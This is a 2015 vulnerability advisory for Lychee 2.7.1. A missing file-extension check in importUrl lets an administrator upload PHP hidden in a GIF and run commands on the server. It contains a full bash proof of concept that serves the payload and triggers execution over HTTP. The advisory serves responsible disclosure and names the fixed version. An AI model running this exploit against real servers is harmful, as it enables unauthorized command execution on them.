Lychee 2.7.1 Remote Code Execution

`Advisory ID: SGMA15-002  
Title: Lychee remote code execution  
Product: Lychee  
Version: 2.7.1 and probably prior  
Vendor: lychee.electerious.com  
Vulnerability type: Remote Code Execution  
Risk level: High  
Credit: Filippo Cavallarin - segment.technology  
CVE: N/A  
Vendor notification: 2015-04-12  
Vendor fix: 2015-04-13  
Public disclosure: 2015-04-15  
  
  
Details  
  
Lychee version 2.7.1 and probably below suffers from remote code execution vulnerability.  
  
The vulnerability resides in the importUrl function that fails to restrict file types due to the lack of file extension validation.  
Since the imported file is stored in a web-readable directory where php files can be executed, remote code execution can be achieved.   
  
Even if the import is limited to image files only, an attacker can abuse this vulnerability by importing a   
specially crafted image file containing PHP code.  
  
To exploit this vulnerability the attacker must be logged as administrator.  
  
The following proof of concept demostrates the issue  
  
#!/bin/bash  
  
LYCHEE_HOST="lychee.local"  
PHPSESSID="e0ac560kmqf0lli9u5jd20qt46"  
LOCALIP="172.16.85.1"  
CMD="uname -a"  
  
cd /tmp || exit 1  
  
echo "Creating gif..."  
GIF="\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF\x21\xFE\x1A<?php system('$CMD')?>"  
echo -e $GIF > gif.php  
  
echo "Starting local webserver"  
python -m SimpleHTTPServer > /dev/null 2>&1 &  
  
sleep 1  
  
echo "Starting the import procedure"  
curl "http://$LYCHEE_HOST/php/api.php" -H "Cookie: PHPSESSID=$PHPSESSID" --data "function=importUrl&url=http%3A//$LOCALIP:8000/gif.php&albumID=0"  
  
sleep 5  
  
kill %1  
rm gif.php  
  
echo "Executing command.."  
curl "http://$LYCHEE_HOST/data/gif.php"  
  
#EOF  
  
  
Solution  
  
Upgrade to Lychee version 2.7.2  
  
  
References  
http://lychee.electerious.com  
  
  
  
  
Filippo Cavallarin  
https://segment.technology/  
`